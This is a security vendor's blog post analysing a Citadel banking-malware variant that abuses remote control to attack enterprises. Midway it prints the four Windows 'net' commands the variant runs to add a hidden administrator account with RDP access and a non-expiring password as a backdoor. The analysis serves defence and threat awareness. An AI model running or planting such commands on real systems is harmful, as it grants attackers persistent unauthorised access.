Using malware to control a malware-infected device is nothing new. In fact, in our article about malware trends in 2014, Amit Klein, Chief Technology Officer of Trusteer, an IBM company, specifically points out that malware will again use old-school techniques to overcome security solutions. One of these tools is the ability to remotely take over a device and use it to commit fraud.

Most advanced types of malware have this ability today, including SpyEye’s use of Remote Desktop Protocol (RDP) and Zeus’ and Citadel’s use of Virtual Network Computing (VNC). The security team at Trusteer, an IBM company, has just discovered a Citadel variant that takes this approach a step further, providing enhanced survivability for the attack as well as expanding this malware’s capabilities to perpetrate targeted attacks on enterprises.

The Rise of Remote Control

The use of RDP and VNC protocols to take over devices is widely used by information technology support teams. When users have issues, they can call technical support, and a support engineer can take over the device to solve the problem. Malware authors have added this functionality to their malware to allow the attacker to take over a victim’s device. Attackers who target high-net-worth accounts cannot rely on automated scripts for their attacks since an attack attempting to steal a six- or seven-digit amount has to be carefully and manually conducted.


This manual process does have benefits, though. First, this evades some security solutions that specifically search for behavior associated with automatic scripts. Second, it allows the attacker to take over an authenticated session and use HTML injection to ask the victim for additional information (such as one-time passwords) in real time. Third, it allows the attacker to circumvent device ID security systems as the attack is coming from the legitimate user’s device, not from the attacker’s device.

Citadel, a malware based on Zeus, has offered VNC capabilities since its first version. Additionally, Citadel offers the attacker the ability to run Windows shell commands. These commands are handy if the attacker wants to get a clearer picture of the network in which the infected PC resides, scan it and prepare the ground for something more than just fraud. This type of network mapping is one of the first steps attackers take in targeted enterprise attacks. They gather intelligence, get a clear picture of the target and then strike. This capability was highlighted when Citadel was introduced to the fraudster underground. Citadel’s advertisement stated, “AutoCMD (This is a good feature to have when analyzing a company’s internal structure).” But Citadel is faced with a problem: If the malware is detected and removed by the victim, the VNC capabilities are lost with it. A recent variant analyzed by Trusteer’s security team demonstrated how attackers, who are likely using Citadel to target enterprises, have found a solution to this problem.

How It Works

The new variant uses a simple yet effective trick. After the device is infected, the ability to run Windows shell commands is used for more than just reconnaissance. The variant also executes the following commands:

  1. net user coresystem Lol117755C /add
  2. net localgroup Administrators coresystem /add
  3. net localgroup "Remote Desktop Users" coresystem /add
  4. net accounts /maxpwage:unlimited

These commands do the following:

  1. Add a new Windows local user (username “coresystem”, password “Lol117755C”)
  2. Add the new user to the local administrator group
  3. Add the new user to the local RDP group
  4. Set the password to never expire

Why Hackers Use Citadel

Now, even if the Citadel malware is detected and removed, the attacker still has access to the infected machine through the native Windows RDP capabilities. The attacker has set up a backup back door into the infected device. Attackers benefit in the following ways when utilizing such a trick, especially when they are preparing for a persistent, long-term attack against an enterprise:

  • Persistence: Even if Citadel (and its VNC module) is lost, the attacker can still use RDP to access the device.
  • The illusion of safety: A user who was vigilant enough to detect and remove Citadel will now feel safe to use his or her device, thinking it is clean.
  • Flying under the radar: While malware modules (such as VNC) and communications may be more vulnerable to interception and analysis by security software, using the Windows-native RDP capabilities may fly under the radar as some companies actually use this exact same protocol for technical support.

Citadel operators are clearly investing in their attack’s survivability and are using the malware’s features to target companies, a departure from its original purpose of financial fraud. Trusteer Rapport (for bank users) and Trusteer Apex (for enterprise users) can detect and prevent Citadel’s infection and its ability to operate, using multiple layers of defense that block the threat along the attack kill chain, preventing the malware from ever infecting the targeted device and running the Windows shell commands. Trusteer’s security team is constantly on the lookout for new and emerging threats and techniques.
